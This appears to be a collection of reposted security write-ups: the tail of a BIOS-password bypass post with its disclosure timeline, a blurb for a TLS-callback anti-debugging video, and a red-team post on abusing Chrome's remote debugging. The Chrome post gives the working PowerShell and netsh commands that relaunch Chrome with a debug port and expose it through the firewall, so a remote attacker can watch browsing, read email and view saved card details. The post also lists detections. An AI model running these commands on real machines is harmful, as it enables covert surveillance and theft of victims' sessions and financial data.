to run would cause a state change that would persist across reboots. That meant that we would not have to return execution to the firmware; after our code had run we could just reboot the board. We looked back at the code inside of BpwManager, and determined there was a two byte checksum that we hadn't erased. We theorized that zeroing that checksum would allow the board to boot. To write the zeros, we simply set RIP to the address of the eepromWrite function and set all other registers to supply the correct function arguments. We put a breakpoint on the return instruction of the eepromWrite function so that execution would not return to firmware code. Returning to firmware code probably would have caused a crash because by modifying the registers we put the board into an undefined state. After overwriting the two bytes and resetting the board, the BIOS password was finally gone! We tried setting our own password from the setup utility just to make sure that it was actually gone and we had full control. That also worked. Obligatory blurb Would you like to reverse engineer and exploit embedded systems? Ones that might even be able to fly? We're hiring! You can view our current open positions at https://www.skysafe.io/jobs. If you don't see a position that looks right for you, feel free to send us a resume. We may have openings that we're not actively hiring for. Timeline 2019-11-14 - Sent email to vendor security contact. Vendor given a 90-day deadline. 2019-11-20 - No response to initial outreach. Sent another email to vendor and CC'd UEFI USRT. 2019-11-20 - UEFI USRT acknowledged receipt of emails 2020-01-30 - Vendor replied and asked what our disclosure plans were. 2020-01-30 - We replied that we were planning on publishing our blog post publicly on 2020-02-12 and offered the vendor a 14-day extension. We included a draft copy of this blog post with this reply. 2020-02-01 - Vendor asked if we were able to reproduce the issues on any other products in the same product line. 2020-02-03 - We replied that we had not attempted to reproduce it on any other products, but all products that use the EmuSecEeprom driver may be vulnerable. 2020-02-04 - Vendor asked for more details on how the UEFI shell was launched. 2020-02-19 - We replied with an explanation of how the EFI_LOAD_OPTION struct works when the LOAD_OPTION_CATEGORY_APP attribute is set. 2020-02-20 - We let the vendor know that we were planning to publish the blog post on 2020-02-21. 2020-02-20 - The vendor said they had been able to reproduce most of the findings and were planning on issuing an advisory. They were having trouble reproducing one of the findings and asked for a full SPI flash image 2020-02-20 - We sent the vendor a full SPI flash image that demonstrated the issue. 2020-02-24 - Blog post published. Sursa: https://github.com/skysafe/reblog/blob/master/0000-defeating-a-laptops-bios-password/README.md
-
In this video we'll see how to execute code before the entry point of the application and before the main function and confuse some debuggers along the way. Let's begin. PoC code: https://github.com/reversinghub/TLS-PoC Analysis tools: - Immunity debugger - CFF Explorer - LordPE - IDA Pro - Visual studio IDE --------------------------------------------------------------------------------------------------- Follow us on Twitter : https://twitter.com/reversinghub Github : https://github.com/reversinghub If you liked this video and you want to learn hands-on how to analyse malware, with real samples and practical exercises, find us on Udemy : https://www.udemy.com/course/reverse-... Thank you ?
-
Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely Posted on Apr 28, 2020 #red #cookies #book #ttp #post-exploitation Chrome’s remote debugging feature enables malware post-exploitation to gain access to cookies. Root privileges are not required. This is a pretty well-known and commonly used adversarial technique - at least since 2018 when Cookie Crimes was released. However, remote debugging also allows observing user activities and sensitive personal information (aka spying on users) and controlling the browser from a remote computer. Below screenshot shows a simulated attacker controlling the victim’s browser and navigating to chrome://settings to inspect information: This is what we will discuss and explore more in this post, and it is a summary of one of the techniques described in the book “Cybersecurity Attacks - Red Team Strategies”. At a high level, remote debugging is a development/test feature which, for some reason, made it into the ordinary retail version of Chrome. Since its a “feature” and requires an adversary/malware to be present on the machine (post-exploitation) Chromium likely won’t be changing anything. Hence this post will highlight important detections that Anti-Virus products and Blue Teams should put in place to have telemetry for catching potential misuse or attacks and protecting users. Hopefully this post can help raise additional awareness to improve detections and countermeasures. But, first things first…. Entering Cookie Crimes A very powerful cookie stealing technique was described by mangopdf in 2018 with “Cookie Crimes“. Chrome offers a remote debugging feature that can be abused by adversaries and malware post-exploitation to steal cookies (doesn’t need root permissions). Cookie Crimes is now also part of Metasploit - cool stuff! When I first saw this it was super useful right away during post-exploitation phase of red teaming ops on macOS to Pass the Cookie. At that time I also started experimenting more with the remote debugging features of Chrome, with some rather scary outcomes - and there is probably a lot more to figure out. Automating and remote controlling Chrome Besides stealing cookies, the feature allows to remotely control the browser, observe browsing sessions, and gain access to sensitive user settings (like saved credit card numbers in the browser, etc). This is what we are going to discuss now a bit more. Disclaimer This information is for research and educational purposes in order to learn about attacks, help build detection and countermeasures. Security and penetration testing requires authorization from proper stakeholders. Headless mode Chrome supports running headless in the background without the user noticing that it is running. Examples here are given for PowerShell, but feel free to adjust to whatever shell/OS you are using: To run Chrome headless without a visible UI, specify the –headless option, as follows: Start-Process "Chrome" "https://www.google.com" --headless This starts Chrome without the UI. To ensure a smooth start, specify –no-first-run. By running Get-Process, you can observe the newly created process as well. To terminate all Chrome instances, simply run: Get-Process chrome | Stop-Process This can be useful when learning more about this API and experimenting with it. Basics of the Chrome remote debugging feature To start Chrome with remote debugging enabled run: Start-Process "Chrome" "https://www.google.com --headless --remote-debugging-port=9222" If you do not specify –headless and there is already an instance of Chrome running, then Chrome will open the new window in the existing browser and not enable the debugging port. So, either terminate all Chrome instances (using the preceding statement) or launch Chrome headless. We will discuss differences in more detail later. Now you can already navigate to localhost:9222 and see the debugging UI and play around with it: At this point an adversary can perform the “Cookie Crimes attack” and steal all cookies using the Network.getAllCookies() API - but let’s experiment more with the UI. Tunneling the UI to the attacker The debugging port is only available locally now, but malware might make that remotely accessible. In order to do that, the adversary can perform a port forward. This will expose the port remotely over the network. In Windows, this can be done by an Administrator using the netsh interface portproxy command. The following command shows how this is performed: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=9222 Remote connections to this port will not be allowed because the firewall blocks them (we forwarded to port 48333). We have to add a new firewall rule to allow port 48333. So, let’s allow that port through the firewall. There are multiple ways to do this on Windows (we focus on Windows now, but should also work on macOS and Linux): Use netsh to add a new firewall rule: netsh advfirewall firewall add rule name="Open Port 48333" dir=in action=allow protocol=TCP localport=48333 On modern Windows machines, this can also be done via PowerShell commands: New-NetFirewallRule -Name ChromeRemote -DisplayName "Open Port 48333" -Direction Inbound -Protocol tcp -LocalPort 48333 -Action Allow -Enabled True Automating and remote controlling browsers as adversarial technique Now, Mallory (our attacker) can connect from her attack machine to Alice’s workstation on port 43888 and start remote controlling Chrome. The following screenshot shows what the initial connection might look like: The screenshot shows the currently available sessions. These are basically the tabs the victim has opened at this point (for example, after restoring the sessions, or just the home page). If you are trying this out yourself, you probably only see the Google home page listed (this is because for now we started a totally new browsing instance). Clicking the link will navigate you to the session/tab of the browser. Spying on Chrome When creating a headless session we typically don’t inherit the user’s settings and so forth (you can look at the –user-data-dir option to learn more about this). Although, there is also the –restore-last-session command-line option, which is something the Cookie Crimes author pointed out as well. The basic idea is to terminate all Chrome instances and then relaunch them with remote debugging enabled. This technique is a bit intrusive, but it is quite effective to restart Chrome with the debug port exposed and at the same time inheriting the users’s settings. To test this yourself, follow these steps: First, terminate all Chrome processes (e.g. using PowerShell, assuming you are in the user’s security context) Afterward, launch Chrome in non-headless mode and restore the last session using the following command: Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session" Then, connect to the remote control UI to observe the victim’s browsing sessions/tabs As can be seen in the screenshot, there are multiple sessions being opened by Alice (the victim): a Google tab, an Outlook.com tab, and a few others. By clicking any of the sessions, the attacker takes control of Alice’s browser UI and can observe (as well as interfere with) what the user is doing. Even multiple attackers can connect to the port and observe the browsing session. As an example, in this demo we simulate the victim having a valid cookie for their email account, and if you enter https://outlook.com in the URL of the debugging session (this is the textbox written underneath the browser URL bar), the attacker will get access to the inbox: As you can see, the remote session can be used pretty much like a local one. We can enter text, click buttons, and fully interact with websites. Peeking at settings (credit card numbers. yikes!) There is one last thing. Navigate to chrome://settings with the remote control. This includes access to settings, passwords (those will pop up a credential prompt for the victim), payment information, including card number (no popup), addresses, and many other settings. The following screenshot shows chrome://settings URL of the victim, include observing sensitive information: Important: During operations consider performing a SSH port forward, so that information goes over an encrypted channel. The examples here are for research and education. And here is a brief animation - if you are not interested in trying to play around with this yourself: Cleaning up and reverting changes Keep in mind that port forwarding was set up earlier to enable the remote exposure of the Chrome debugging API on port 48333. In order to remove port forwarding and revert to the defaults, we can run the following command: netsh interface portproxy reset Alternatively, there is a delete argument. The same applies for opening port 48333. The firewall rule can be removed again using the following command: netsh advfirewall firewall del rule name="Open Port 48333" or if you used the PowerShell example: Remove-NetFirewallRule -Name ChromeRemote Finally, close all Chrome sessions by running the following command (to get your host back into a clean state): Get-Process chrome | Stop-Process That’s it – the machine should be back in a non-exposed state. Port forwarding not really needed The port forward is not really needed, but I thought its cool to show how this can be done on Windows. Since for some reason those “networky” things seem to be less known on Windows. Chrome also has the --remote-debugging-address feature, that an adversary can set to 0.0.0.0 to listen on all interfaces. Although, that only works in headless mode and needs usage of the custom --user-data-dir. Detections and Mitigations Blue teams should look for processes launched with the –remote-debugging-port argument, and related features (–user-data-dir,…) to identify potential misuse or malware This is a post-exploitation scenario, so not having malware, adversaries, or multiple admins on your machine is good advise Practicing an Assume Breach mindset and entertaining the idea that malware is already present on machines (at least on some machines in corporate environments) is always mature and solid advise (because it usually is) Chrome should not allow remote debugging of things like chrome://settings Or maybe at least require the user’s password when navigating to chrome://settings before showing sensitive information Majority of users (probably 99.999%+) do not need remote debugging - maybe there could be a different solution for developers compared to regular users. Red Team Strategies If you liked this post and found it informative or inspirational, you might be interested in the book “Cybersecurity Attacks - Red Team Strategies”. The book is filled with further ideas, research and fundamental techniques, as well as red teaming program and people mangement aspects. Hiccups and changes Chrome changes quite frequently, so some things need updates and then a few months later they original attacks work again. When I did this the very first time, like over a year ago, there were some URL hiccups that I had to resolve, and described a bit more in the book - but its pretty straight forward to figure out. The URL that Chrome shows, pointing to something like: https://chrome-devtools-frontend.appspot.com/serve_file/@e7fbb071abe9328cdce4feedac9122435fbd1111/inspector.html?ws=[more stuff here] That needs to be updated to something like this: http://**localhost:9222/devtools**/inspector.html?ws=**localhost:9222**/devtools/page/D9CF6B093CB84FD0378C735AD056FCB7&remoteFrontend=true When I did this last time this wasn’t necessary. Chrome’s behavior changes frequently, so some of this might be different again - most recently it seems that this is at times not necessary anymore (especially if you leverage –restore-last-session) References Chromium Blog - Remote Debugging with Chrome Developer Cookie Crimes MITRE ATT&CK Technique T1539: Steal Web Session Cookie MITRE ATT&CK Technique T1506: Web Session Cookie Sursa: https://wunderwuzzi23.github.io/blog/posts/2020/chrome-spy-remote-control/